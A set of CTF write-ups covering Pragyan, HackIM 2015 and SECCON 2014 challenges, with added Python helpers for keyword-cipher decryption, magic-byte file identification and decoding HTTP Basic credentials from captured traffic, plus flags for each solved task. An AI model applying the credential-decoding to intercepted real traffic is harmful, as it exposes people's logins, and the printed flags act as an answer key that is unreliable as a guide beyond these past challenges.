and get the flag: deltactfpragyan
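
Both keyword-cipher challenges above (One more headache and Access Code) can be solved offline. As an added example, not the braingle decoder itself, the Python below builds the keyword alphabet the usual way (the keyword's letters in order of first appearance, then the remaining letters of the alphabet), decrypts with it, and tries a list of candidate keywords against a crib such as "ctf" for the case where the key has to be guessed from context; the candidate list in the demo is assumed.

```python
import string

ALPHABET = string.ascii_lowercase


def keyword_alphabet(keyword):
    """Cipher alphabet for a keyword cipher: keyword letters in order of first
    appearance (duplicates dropped), then the rest of a-z in order. Padding the
    key with repeated letters, as the write-up did, changes nothing."""
    seen = []
    for ch in keyword.lower():
        if ch in ALPHABET and ch not in seen:
            seen.append(ch)
    return "".join(seen) + "".join(c for c in ALPHABET if c not in seen)


def keyword_encrypt(plaintext, keyword):
    """Plain a-z maps position-by-position onto the cipher alphabet; other characters pass through."""
    table = str.maketrans(ALPHABET, keyword_alphabet(keyword))
    return plaintext.lower().translate(table)


def keyword_decrypt(ciphertext, keyword):
    """Inverse mapping of keyword_encrypt."""
    table = str.maketrans(keyword_alphabet(keyword), ALPHABET)
    return ciphertext.lower().translate(table)


def try_keywords(ciphertext, candidates, crib):
    """Decrypt under each candidate keyword and keep the ones whose plaintext
    contains the crib (a word you expect to see, e.g. the CTF's name or 'ctf')."""
    hits = []
    for kw in candidates:
        pt = keyword_decrypt(ciphertext, kw)
        if crib in pt:
            hits.append((kw, pt))
    return hits


if __name__ == "__main__":
    print(keyword_decrypt("dhkuagsn", "prgyanpr"))          # One more headache
    print(keyword_decrypt("heitsctrnpsmysk", "saschaherm"))  # Access Code
    # Assumed candidate list: words from the challenge text and the event name
    print(try_keywords("dhkuagsn", ["pragyan", "prgyan", "delta", "headache"], "ctf"))
```

Because a keyword cipher is a plain monoalphabetic substitution, try_keywords is just a convenience for short ciphertexts where a crib is known; on longer texts letter-frequency analysis would recover the alphabet without any keyword guess.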

MISC
Totally abstruse (30 pts)

no point guessing

We were given an image:

[Image: world.png]

A Google image search on this image brought up the Piet programming language.
I found an online interpreter at
http://www.bertnase.de/npiet/npiet-execute.php

Execute the image/code:

Hi,
Welcome to npiet online !

Info: upload status: Ok
Info: found picture width=115 height=115 and codel size=5
Uploaded picture (shown with a small border): world.png

Info: executing: npiet -e 1000000 world.png

Hello, world!

Flag: Hello, world!

HackIM 2015

Another good CTF; I found it very challenging. Most of my team was not able to participate, so we did not do well. I was only able to solve one problem myself, but it seems I was on the right track on several others. I'm sure if we had more team members participating we could have put our minds together and solved more.

Forensics 300

mount -o loop FOR-300 /media/image

ls -laf

There is a .sh in the root directory that created the random directories and files.

total 84K
-rw-r--r-- 1 root root 4.9K Dec 31 1969 02CdWGSxGPX.bin
drwxr-xr-x 1 root root 0 Dec 31 1969 0GY1l
drwxr-xr-x 1 root root 0 Dec 31 1969 0h3a5
drwxr-xr-x 1 root root 0 Dec 31 1969 0l
drwxr-xr-x 1 root root 0 Dec 31 1969 0qsd
drwxr-xr-x 1 root root 0 Dec 31 1969 0wDq5
drwxr-xr-x 1 root root 0 Dec 31 1969 0Xs
drwxr-xr-x 1 root root 0 Dec 31 1969 1
drwxr-xr-x 1 root root 0 Dec 31 1969 2X
drwxr-xr-x 1 root root 0 Dec 31 1969 3
drwxr-xr-x 1 root root 0 Dec 31 1969 3J
drwxr-xr-x 1 root root 0 Dec 31 1969 44aAm
drwxr-xr-x 1 root root 0 Dec 31 1969 4A
drwxr-xr-x 1 root root 0 Dec 31 1969 4c
drwxr-xr-x 1 root root 0 Dec 31 1969 4CfVyuIW
drwxr-xr-x 1 root root 0 Dec 31 1969 4CQU
drwxr-xr-x 1 root root 208 Dec 31 1969 5Iuc
drwxr-xr-x 1 root root 260 Dec 31 1969 5U7WRf
-rw-r--r-- 1 root root 19K Dec 31 1969 5ySfqnmFgFQd6il.bin
drwxr-xr-x 1 root root 0 Dec 31 1969 6JR3
drwxr-xr-x 1 root root 124 Dec 31 1969 6wUaZE1vbsW
drwxr-xr-x 1 root root 0 Dec 31 1969 75c083YdQf
drwxr-xr-x 1 root root 0 Dec 31 1969 7H7geLlS5
drwxr-xr-x 1 root root 0 Dec 31 1969 8A2MFawD4
drwxr-xr-x 1 root root 0 Dec 31 1969 8DQFirm0D
drwxr-xr-x 1 root root 0 Dec 31 1969 8HhWfV9nK1
drwxr-xr-x 1 root root 0 Dec 31 1969 8nwg
drwxr-xr-x 1 root root 0 Dec 31 1969 8RxQG4bvd
drwxr-xr-x 1 root root 0 Dec 31 1969 95D
drwxr-xr-x 1 root root 2.3K Dec 31 1969 a
drwxr-xr-x 1 root root 0 Dec 31 1969 aCIzN8I5
drwxr-xr-x 1 root root 0 Dec 31 1969 acy
drwxr-xr-x 1 root root 0 Dec 31 1969 Ad1CAg
drwxr-xr-x 1 root root 0 Dec 31 1969 aE
drwxr-xr-x 1 root root 0 Dec 31 1969 b
drwxr-xr-x 1 root root 268 Dec 31 1969 b0dNwf3bNy
drwxr-xr-x 1 root root 0 Dec 31 1969 b66
-rw-r--r-- 1 root root 11K Dec 31 1969 B6IdX6a.bin
drwxr-xr-x 1 root root 284 Dec 31 1969 BY
-rw-r--r-- 1 root root 12K Dec 31 1969 BYqYsXqp.bin
drwxr-xr-x 1 root root 0 Dec 31 1969 C
drwxr-xr-x 1 root root 0 Dec 31 1969 CEBIjqOoYttzQ
drwxr-xr-x 1 root root 0 Dec 31 1969 cOyWvykD1l1
drwxr-xr-x 1 root root 0 Dec 31 1969 cQLp9t6svJj
drwxr-xr-x 1 root root 0 Dec 31 1969 cTFarHjM
drwxr-xr-x 1 root root 0 Dec 31 1969 d2
drwxr-xr-x 1 root root 216 Dec 31 1969 dG7pHp24fl
drwxr-xr-x 1 root root 0 Dec 31 1969 DGcf
drwxr-xr-x 1 root root 0 Dec 31 1969 doKP
drwxr-xr-x 1 root root 144 Dec 31 1969 dontD0AnythingHERE
drwxr-xr-x 1 root root 0 Dec 31 1969 DS33Meg
drwxr-xr-x 1 root root 260 Dec 31 1969 duKt4ZJ
drwxr-xr-x 1 root root 0 Dec 31 1969 e
drwxr-xr-x 1 root root 0 Dec 31 1969 Ebnpv
drwxr-xr-x 1 root root 0 Dec 31 1969 F
drwxr-xr-x 1 root root 0 Dec 31 1969 FdnSdaQwA
drwxr-xr-x 1 root root 0 Dec 31 1969 FfrD0o
drwxr-xr-x 1 root root 0 Dec 31 1969 FinD
drwxr-xr-x 1 root root 0 Dec 31 1969 fm
drwxr-xr-x 1 root root 0 Dec 31 1969 g
drwxr-xr-x 1 root root 0 Dec 31 1969 gtj
drwxr-xr-x 1 root root 0 Dec 31 1969 h
drwxr-xr-x 1 root root 0 Dec 31 1969 H
drwxr-xr-x 1 root root 0 Dec 31 1969 H2Zj8FNbu
drwxr-xr-x 1 root root 0 Dec 31 1969 hdi7
drwxr-xr-x 1 root root 0 Dec 31 1969 hYuPvID
drwxr-xr-x 1 root root 0 Dec 31 1969 i
drwxr-xr-x 1 root root 132 Dec 31 1969 imgLDPt4BY
drwxr-xr-x 1 root root 0 Dec 31 1969 ix1EMRHRpIc2
drwxr-xr-x 1 root root 0 Dec 31 1969 j6uLMX
drwxr-xr-x 1 root root 0 Dec 31 1969 jE
drwxr-xr-x 1 root root 0 Dec 31 1969 jj
drwxr-xr-x 1 root root 0 Dec 31 1969 junk
drwxr-xr-x 1 root root 0 Dec 31 1969 JUr
drwxr-xr-x 1 root root 0 Dec 31 1969 K2QWa5
drwxr-xr-x 1 root root 116 Dec 31 1969 k6
drwxr-xr-x 1 root root 0 Dec 31 1969 k6B4zgvO9Ee
drwxr-xr-x 1 root root 0 Dec 31 1969 kNJSs
drwxr-xr-x 1 root root 0 Dec 31 1969 KS
drwxr-xr-x 1 root root 0 Dec 31 1969 KxEQM
drwxr-xr-x 1 root root 0 Dec 31 1969 LG6F
drwxr-xr-x 1 root root 0 Dec 31 1969 Lh
-rw-r--r-- 1 root root 2.1K Dec 31 1969 LlC6Z0zrgy.bin
drwxr-xr-x 1 root root 0 Dec 31 1969 LO0J8
drwx------ 1 root root 0 Dec 31 1969 lost+found
drwxr-xr-x 1 root root 0 Dec 31 1969 LvuGM
drwxr-xr-x 1 root root 0 Dec 31 1969 lWIRfzP
drwxr-xr-x 1 root root 0 Dec 31 1969 m
drwxr-xr-x 1 root root 0 Dec 31 1969 m9V0lIaElz
drwxr-xr-x 1 root root 0 Dec 31 1969 MiU
drwxr-xr-x 1 root root 0 Dec 31 1969 Mnuc
drwxr-xr-x 1 root root 0 Dec 31 1969 n
drwxr-xr-x 1 root root 208 Dec 31 1969 NgzQPW
drwxr-xr-x 1 root root 0 Dec 31 1969 Nv
drwxr-xr-x 1 root root 0 Dec 31 1969 o
drwxr-xr-x 1 root root 0 Dec 31 1969 O7avZhikgKgbF
drwxr-xr-x 1 root root 0 Dec 31 1969 o8
drwxr-xr-x 1 root root 0 Dec 31 1969 OOoOs
drwxr-xr-x 1 root root 148 Dec 31 1969 orcA
drwxr-xr-x 1 root root 0 Dec 31 1969 oSx2p
drwxr-xr-x 1 root root 0 Dec 31 1969 OT
drwxr-xr-x 1 root root 108 Dec 31 1969 poiuy7Xdb
drwxr-xr-x 1 root root 0 Dec 31 1969 px6u
drwxr-xr-x 1 root root 0 Dec 31 1969 Q
drwxr-xr-x 1 root root 224 Dec 31 1969 qkCN8
drwxr-xr-x 1 root root 0 Dec 31 1969 QmUY1d
drwxr-xr-x 1 root root 240 Dec 31 1969 QQY3sF63w
drwxr-xr-x 1 root root 0 Dec 31 1969 r
drwxr-xr-x 1 root root 0 Dec 31 1969 Raf3SYj
-rw-r--r-- 1 root root 4.2K Dec 31 1969 ran2.sh
drwxr-xr-x 1 root root 256 Dec 31 1969 rhZE1LZ6g
drwxr-xr-x 1 root root 0 Dec 31 1969 Ruc9
drwxr-xr-x 1 root root 0 Dec 31 1969 RZTOGd
drwxr-xr-x 1 root root 0 Dec 31 1969 scripts
-rw-r--r-- 1 root root 0 Dec 31 1969 sdb.cramfs
drwxr-xr-x 1 root root 0 Dec 31 1969 sn
drwxr-xr-x 1 root root 0 Dec 31 1969 SPaK8l2sYN
drwxr-xr-x 1 root root 0 Dec 31 1969 SrZznhSAj
drwxr-xr-x 1 root root 0 Dec 31 1969 t
drwxr-xr-x 1 root root 0 Dec 31 1969 T
-rw-r--r-- 1 root root 2.2K Dec 31 1969 TFGVOSwYd.txt
drwxr-xr-x 1 root root 0 Dec 31 1969 TFhmGS
drwxr-xr-x 1 root root 0 Dec 31 1969 u
drwxr-xr-x 1 root root 0 Dec 31 1969 uHuZk04I
drwxr-xr-x 1 root root 0 Dec 31 1969 UivNZ
drwxr-xr-x 1 root root 0 Dec 31 1969 UpVRswF
drwxr-xr-x 1 root root 0 Dec 31 1969 URdRCrZo
drwxr-xr-x 1 root root 0 Dec 31 1969 v
-rw-r--r-- 1 root root 9.0K Dec 31 1969 W0HTWw6oxK.bin
drwxr-xr-x 1 root root 0 Dec 31 1969 weH
drwxr-xr-x 1 root root 0 Dec 31 1969 wOImbu
drwxr-xr-x 1 root root 0 Dec 31 1969 xawcc
drwxr-xr-x 1 root root 0 Dec 31 1969 Xde
-rw-r--r-- 1 root root 6.0K Dec 31 1969 XM8cUidmtho.bin
drwxr-xr-x 1 root root 0 Dec 31 1969 Xnd5
drwxr-xr-x 1 root root 0 Dec 31 1969 XZn
drwxr-xr-x 1 root root 0 Dec 31 1969 Y
drwxr-xr-x 1 root root 0 Dec 31 1969 YDTfukUo
drwxr-xr-x 1 root root 0 Dec 31 1969 YMrSfm
drwxr-xr-x 1 root root 0 Dec 31 1969 Ys
-rw-r--r-- 1 root root 2.5K Dec 31 1969 zBY1I NZU1pc.txt

I tried several methods: looked through the files by date to see if one was modified more recently, and by file size to see if one stood out as bigger. In the end, running file on every file made some of them stand out, and after looking through 3 or 4 of those the flag was found.

Run file on all the files to see if anything stands out. I see several txt and jpg files; looking through them, I found a jpg containing the flag.

find . -name '*' -exec file {} + | more

./poiuy7Xdb/7yknXuW/VXIXNxl/sZ5 lxAn3HBp: directory
./poiuy7Xdb/7yknXuW/VXIXNxl/sZ5 lxAn3HBp/05O1rxFMm.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/sZ5 lxAn3HBp/HjrRoQkK2v.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/sZ5 lxAn3HBp/chDQpCvsZmlD.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/sZ5 lxAn3HBp/gcTf6LR8ZR.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/siFH0M2Vgh: directory
./poiuy7Xdb/7yknXuW/VXIXNxl/siFH0M2Vgh/MVI4LugVpb7qg.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/siFH0M2Vgh/uPQpX9Kxm3QEr33zaH.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/wmDKAM 1: directory
./poiuy7Xdb/7yknXuW/VXIXNxl/wmDKAM 1/7PgIrSa.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/wmDKAM 1/GhIMarfKkrrB.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/wmDKAM 1/lkjhwerle.jpg: JPEG image data, JFIF standard 1.01
./poiuy7Xdb/7yknXuW/gDObUWcZZG: directory
./poiuy7Xdb/7yknXuW/gDObUWcZZG/2maON5: directory
./poiuy7Xdb/7yknXuW/gDObUWcZZG/2maON5/HuD6lKeYHl.JPG: data
./poiuy7Xdb/7yknXuW/gDObUWcZZG/2maON5/z9XJfuFfqIXSU.JPG: data
./poiuy7Xdb/7yknXuW/gDObUWcZZG/5ErUBUSL3uNc.JPG: data
./poiuy7Xdb/7yknXuW/gDObUWcZZG/WGmoUW6YJ6ne: directory
./poiuy7Xdb/7yknXuW/gDObUWcZZG/WGmoUW6YJ6ne/5zOfI0qlna9R.JPG: data
./poiuy7Xdb/7yknXuW/gDObUWcZZG/WGmoUW6YJ6ne/EfRU5k8r.JPG: data
./poiuy7Xdb/7yknXuW/gDObUWcZZG/WGmoUW6YJ6ne/ILK9wXbmeS9DKOL.JPG: data
./poiuy7Xdb/7yknXuW/gDObUWcZZG/WGmoUW6YJ6ne/gymTmPz.JPG: data

The file was ./poiuy7Xdb/7yknXuW/VXIXNxl/wmDKAM 1/lkjhwerle.jpg: JPEG image data, JFIF standard 1.01

flag{f0rens!cs!sC00l}
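
The file-on-everything approach above generalises to a simple rule: trust magic bytes, not extensions. As an added example (not the author's tooling), the Python below walks a tree, identifies each file by a short magic table and reports the ones that are a real format regardless of what the name claims; the sample tree it builds in a temporary directory is constructed to mimic the listing above (junk-filled .JPG decoys, one genuine JPEG header, one text file) and is not the challenge image.

```python
import os
import tempfile

# Magic prefixes for the formats worth recognising here (constructed table, not exhaustive)
MAGIC = [
    (b"\xff\xd8\xff", "jpg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"%PDF-", "pdf"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"PK\x03\x04", "zip"),
]


def identify(head):
    """Return the format name for a file header, or 'data' when nothing matches
    (the same verdict file(1) gave for the decoy .JPG files in the challenge)."""
    for prefix, name in MAGIC:
        if head.startswith(prefix):
            return name
    return "data"


def classify_tree(root):
    """Walk root and return {relative path: detected type} for every regular file."""
    result = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                head = fh.read(16)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            result[rel] = identify(head)
    return result


def recognised_files(root):
    """Files whose content is a real, recognised format, whatever the extension says."""
    return sorted((p, t) for p, t in classify_tree(root).items() if t != "data")


def type_counts(root):
    """How many files of each detected type; a lone 'jpg' among hundreds of 'data' is the tell."""
    counts = {}
    for t in classify_tree(root).values():
        counts[t] = counts.get(t, 0) + 1
    return counts


def build_sample_tree(root):
    """Constructed stand-in for the challenge image: two .JPG decoys holding junk,
    one genuine JPEG (SOI marker + JFIF APP0 header), one text file."""
    os.makedirs(os.path.join(root, "poiuy7Xdb", "wmDKAM 1"))
    files = {
        "poiuy7Xdb/7PgIrSa.JPG": b"\x00junk, not an image\x00" * 4,
        "poiuy7Xdb/wmDKAM 1/GhIMarfKkrrB.JPG": bytes(range(64)),
        "poiuy7Xdb/wmDKAM 1/lkjhwerle.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 32,
        "TFGVOSwYd.txt": b"plain text decoy\n",
    }
    for rel, content in files.items():
        with open(os.path.join(root, *rel.split("/")), "wb") as fh:
            fh.write(content)


def run_demo():
    """Build the sample tree in a temp dir and return (recognised files, type counts)."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return recognised_files(root), type_counts(root)


if __name__ == "__main__":
    found, counts = run_demo()
    print("type counts:", counts)
    for path, ftype in found:
        print("%s: %s" % (path, ftype))
```

On the real mounted image, `recognised_files("/media/image")` would have listed lkjhwerle.jpg directly instead of paging through the output of find and file.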

SECCON 2014

SECCON 2014 took place last weekend and again part of my CTF team was able to participate. For the most part I felt this was a well-run CTF. The biggest issue I noticed was with the web challenges: there were problems with required DLLs and the like that caused a lot of conversation in the IRC channel. I didn't work on any of those challenges, so I can't speak to it first hand. But there was a nice mix of challenges, even QR challenges.

Challenges (name, category, points scored / points available):

Welcome to SECCON Start 100 / 100
Easy Cipher Crypto 100 / 100
Decrypt it (Easy) Crypto 0 / 200
Decrypt it (Hard) Crypto 0 / 300
Ms.Fortune? Misfortune. : 4096-bit RSA Crypto 0 / 400
Shuffle Binary 100 / 100
Reverse it Binary 0 / 100
Let’s disassemble Binary 0 / 200
Advanced RISC Machine Exploit 0 / 300
ROP: Impossible Exploit 0 / 500
Holy shellcode Exploit 0 / 400
Japanese super micro-controller Exploit 0 / 500
jspuzzle Web 0 / 100
REA-JUU WATCH Web 200 / 200
Bleeding “Heartbleed” Test Web Web 0 / 300
Binary Karuta Web 0 / 400
XSS Bonsai (aka. Hakoniwa XSS Reloaded) Web 0 / 500
QR (Easy) QR 0 / 200
SECCON Wars: The Flag Awakens QR 0 / 300
BBQR QR 0 / 400
Get the key.txt Forensics 100 / 100
Read it Forensics 0 / 300
UnknownFS Forensics 0 / 400
Confused analyte Forensics 0 / 500
Choose the number Programming 100 / 100
The Golden Gate Programming 0 / 400
Get the key Network 100 / 100
Get from curious “FTP” server Network 0 / 300
version2 Network 0 / 200
Here are the notes for some of the challenges I solved.

Get the key – 100

Found a web HTTP session in the provided PCAP, using Basic authentication:

GET /nw100/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ja-JP,en-US;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 133.242.224.21:6809
Authorization: Basic c2VjY29uMjAxNDpZb3VyQmF0dGxlRmllbGQ=
Connection: Keep-Alive
DNT: 1

HTTP/1.1 200 OK
Date: Sat, 29 Nov 2014 13:10:48 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 450
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /nw100</title>
</head>
<body>
<h1>Index of /nw100</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right"> - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="key.html">key.html</a></td><td align="right">29-Nov-2014 22:04 </td><td align="right"> 45 </td><td>&nbsp;</td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.2.22 (Debian) Server at 133.242.224.21 Port 6809</address>
</body></html>
Take the Authorization header and Base64-decode the credentials:

seccon2014:YourBattleField

Go to the web site and enter the login:

http://133.242.224.21:6809/nw100/key.html

and get the flag:

SECCON{Basic_NW_Challenge_Done!}
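As an added example, not code from the write-up, here is a Python check that scans captured HTTP request text for Basic Authorization headers and decodes them: the manual step above, run over a request excerpt constructed from the headers shown. Anything it returns was sent in the clear on the wire.

```python
import base64
import binascii
import re
from typing import List, Tuple

# Constructed excerpt of the request headers from the PCAP dump above.
SAMPLE_REQUEST = (
    "GET /nw100/ HTTP/1.1\r\n"
    "Host: 133.242.224.21:6809\r\n"
    "Authorization: Basic c2VjY29uMjAxNDpZb3VyQmF0dGxlRmllbGQ=\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

# One header per line; \s* before $ swallows the trailing CR of CRLF.
_AUTH_RE = re.compile(r"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$",
                      re.IGNORECASE | re.MULTILINE)


def basic_credentials(raw_request: str) -> List[Tuple[str, str]]:
    """Return (username, password) pairs found in Basic Authorization headers.

    RFC 7617 defines the credential as base64(user ":" password); the user
    name cannot contain ':', so the split is on the first colon only.
    """
    found = []
    for token in _AUTH_RE.findall(raw_request):
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # malformed header: skip it rather than crash the scan
        user, sep, password = decoded.partition(":")
        if sep:
            found.append((user, password))
    return found
```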

————————————————————————————————–

Shuffle – 100

Load the binary into Hopper, look at the main function and convert each mov eax immediate to its ASCII character.

Dump of assembler code for function main:
0x0804852d <+0>: push ebp
0x0804852e <+1>: mov ebp,esp
0x08048530 <+3>: push esi
0x08048531 <+4>: push ebx
0x08048532 <+5>: and esp,0xfffffff0
0x08048535 <+8>: sub esp,0x50
0x08048538 <+11>: mov eax,DWORD PTR [ebp+0xc]
0x0804853b <+14>: mov DWORD PTR [esp+0xc],eax
0x0804853f <+18>: mov eax,gs:0x14
0x08048545 <+24>: mov DWORD PTR [esp+0x4c],eax
0x08048549 <+28>: xor eax,eax
0x0804854b <+30>: mov eax,0x53
0x08048550 <+35>: mov BYTE PTR [esp+0x24],al
0x08048554 <+39>: mov eax,0x45
0x08048559 <+44>: mov BYTE PTR [esp+0x25],al
0x0804855d <+48>: mov eax,0x43
0x08048562 <+53>: mov BYTE PTR [esp+0x26],al
0x08048566 <+57>: mov eax,0x43
0x0804856b <+62>: mov BYTE PTR [esp+0x27],al
0x0804856f <+66>: mov eax,0x4f
0x08048574 <+71>: mov BYTE PTR [esp+0x28],al
0x08048578 <+75>: mov eax,0x4e
0x0804857d <+80>: mov BYTE PTR [esp+0x29],al
0x08048581 <+84>: mov eax,0x7b
0x08048586 <+89>: mov BYTE PTR [esp+0x2a],al
0x0804858a <+93>: mov eax,0x57
0x0804858f <+98>: mov BYTE PTR [esp+0x2b],al
0x08048593 <+102>: mov eax,0x65
0x08048598 <+107>: mov BYTE PTR [esp+0x2c],al
0x0804859c <+111>: mov eax,0x6c
0x080485a1 <+116>: mov BYTE PTR [esp+0x2d],al
0x080485a5 <+120>: mov eax,0x63
0x080485aa <+125>: mov BYTE PTR [esp+0x2e],al
0x080485ae <+129>: mov eax,0x6f
0x080485b3 <+134>: mov BYTE PTR [esp+0x2f],al
0x080485b7 <+138>: mov eax,0x6d
0x080485bc <+143>: mov BYTE PTR [esp+0x30],al
0x080485c0 <+147>: mov eax,0x65
0x080485c5 <+152>: mov BYTE PTR [esp+0x31],al
0x080485c9 <+156>: mov eax,0x20
0x080485ce <+161>: mov BYTE PTR [esp+0x32],al
0x080485d2 <+165>: mov eax,0x74
0x080485d7 <+170>: mov BYTE PTR [esp+0x33],al
0x080485db <+174>: mov eax,0x6f
0x080485e0 <+179>: mov BYTE PTR [esp+0x34],al
0x080485e4 <+183>: mov eax,0x20
0x080485e9 <+188>: mov BYTE PTR [esp+0x35],al
0x080485ed <+192>: mov eax,0x74
0x080485f2 <+197>: mov BYTE PTR [esp+0x36],al
0x080485f6 <+201>: mov eax,0x68
0x080485fb <+206>: mov BYTE PTR [esp+0x37],al
0x080485ff <+210>: mov eax,0x65
0x08048604 <+215>: mov BYTE PTR [esp+0x38],al
0x08048608 <+219>: mov eax,0x20
0x0804860d <+224>: mov BYTE PTR [esp+0x39],al
0x08048611 <+228>: mov eax,0x53
0x08048616 <+233>: mov BYTE PTR [esp+0x3a],al
0x0804861a <+237>: mov eax,0x45
0x0804861f <+242>: mov BYTE PTR [esp+0x3b],al
0x08048623 <+246>: mov eax,0x43
0x08048628 <+251>: mov BYTE PTR [esp+0x3c],al
0x0804862c <+255>: mov eax,0x43
0x08048631 <+260>: mov BYTE PTR [esp+0x3d],al
0x08048635 <+264>: mov eax,0x4f
0x0804863a <+269>: mov BYTE PTR [esp+0x3e],al
0x0804863e <+273>: mov eax,0x4e
0x08048643 <+278>: mov BYTE PTR [esp+0x3f],al
0x08048647 <+282>: mov eax,0x20
0x0804864c <+287>: mov BYTE PTR [esp+0x40],al
0x08048650 <+291>: mov eax,0x32
0x08048655 <+296>: mov BYTE PTR [esp+0x41],al
0x08048659 <+300>: mov eax,0x30
0x0804865e <+305>: mov BYTE PTR [esp+0x42],al
0x08048662 <+309>: mov eax,0x31
0x08048667 <+314>: mov BYTE PTR [esp+0x43],al
0x0804866b <+318>: mov eax,0x34
0x08048670 <+323>: mov BYTE PTR [esp+0x44],al
0x08048674 <+327>: mov eax,0x20
0x08048679 <+332>: mov BYTE PTR [esp+0x45],al
0x0804867d <+336>: mov eax,0x43
0x08048682 <+341>: mov BYTE PTR [esp+0x46],al
0x08048686 <+345>: mov eax,0x54
0x0804868b <+350>: mov BYTE PTR [esp+0x47],al
0x0804868f <+354>: mov eax,0x46
0x08048694 <+359>: mov BYTE PTR [esp+0x48],al
0x08048698 <+363>: mov eax,0x21
0x0804869d <+368>: mov BYTE PTR [esp+0x49],al
0x080486a1 <+372>: mov eax,0x7d
0x080486a6 <+377>: mov BYTE PTR [esp+0x4a],al
0x080486aa <+381>: mov eax,0x0
0x080486af <+386>: mov BYTE PTR [esp+0x4b],al
0x080486b3 <+390>: mov DWORD PTR [esp],0x0
0x080486ba <+397>: call 0x80483b0 <time@plt>
0x080486bf <+402>: mov ebx,eax
0x080486c1 <+404>: call 0x80483d0 <getpid@plt>
0x080486c6 <+409>: add eax,ebx
0x080486c8 <+411>: mov DWORD PTR [esp],eax
0x080486cb <+414>: call 0x8048400 <srand@plt>
0x080486d0 <+419>: mov DWORD PTR [esp+0x14],0x0
0x080486d8 <+427>: jmp 0x8048769 <main+572>
0x080486dd <+432>: call 0x8048420 <rand@plt>
0x080486e2 <+437>: mov ecx,eax
0x080486e4 <+439>: mov edx,0xcccccccd
0x080486e9 <+444>: mov eax,ecx
0x080486eb <+446>: mul edx
0x080486ed <+448>: shr edx,0x5
0x080486f0 <+451>: mov eax,edx
0x080486f2 <+453>: shl eax,0x2
0x080486f5 <+456>: add eax,edx
0x080486f7 <+458>: shl eax,0x3
0x080486fa <+461>: sub ecx,eax
0x080486fc <+463>: mov edx,ecx
0x080486fe <+465>: mov DWORD PTR [esp+0x18],edx
0x08048702 <+469>: call 0x8048420 <rand@plt>
0x08048707 <+474>: mov ecx,eax
0x08048709 <+476>: mov edx,0xcccccccd
0x0804870e <+481>: mov eax,ecx
0x08048710 <+483>: mul edx
0x08048712 <+485>: shr edx,0x5
0x08048715 <+488>: mov eax,edx
0x08048717 <+490>: shl eax,0x2
0x0804871a <+493>: add eax,edx
0x0804871c <+495>: shl eax,0x3
0x0804871f <+498>: sub ecx,eax
0x08048721 <+500>: mov edx,ecx
0x08048723 <+502>: mov DWORD PTR [esp+0x1c],edx
0x08048727 <+506>: lea edx,[esp+0x24]
0x0804872b <+510>: mov eax,DWORD PTR [esp+0x18]
0x0804872f <+514>: add eax,edx
0x08048731 <+516>: movzx eax,BYTE PTR [eax]
0x08048734 <+519>: movsx eax,al
0x08048737 <+522>: mov DWORD PTR [esp+0x20],eax
0x0804873b <+526>: lea edx,[esp+0x24]
0x0804873f <+530>: mov eax,DWORD PTR [esp+0x1c]
0x08048743 <+534>: add eax,edx
0x08048745 <+536>: movzx eax,BYTE PTR [eax]
0x08048748 <+539>: lea ecx,[esp+0x24]
0x0804874c <+543>: mov edx,DWORD PTR [esp+0x18]
0x08048750 <+547>: add edx,ecx
0x08048752 <+549>: mov BYTE PTR [edx],al
0x08048754 <+551>: mov eax,DWORD PTR [esp+0x20]
0x08048758 <+555>: lea ecx,[esp+0x24]
0x0804875c <+559>: mov edx,DWORD PTR [esp+0x1c]
0x08048760 <+563>: add edx,ecx
0x08048762 <+565>: mov BYTE PTR [edx],al
0x08048764 <+567>: add DWORD PTR [esp+0x14],0x1
0x08048769 <+572>: cmp DWORD PTR [esp+0x14],0x63
0x0804876e <+577>: jle 0x80486dd <main+432>
0x08048774 <+583>: lea eax,[esp+0x24]
0x08048778 <+587>: mov DWORD PTR [esp],eax
0x0804877b <+590>: call 0x80483e0 <puts@plt>
0x08048780 <+595>: mov eax,0x0
0x08048785 <+600>: mov esi,DWORD PTR [esp+0x4c]
0x08048789 <+604>: xor esi,DWORD PTR gs:0x14
0x08048790 <+611>: je 0x8048797 <main+618>
0x08048792 <+613>: call 0x80483c0 <__stack_chk_fail@plt>
0x08048797 <+618>: lea esp,[ebp-0x8]
0x0804879a <+621>: pop ebx
0x0804879b <+622>: pop esi
0x0804879c <+623>: pop ebp
0x0804879d <+624>: ret

The flag is SECCON{Welcome to the SECCON 2014 CTF!}
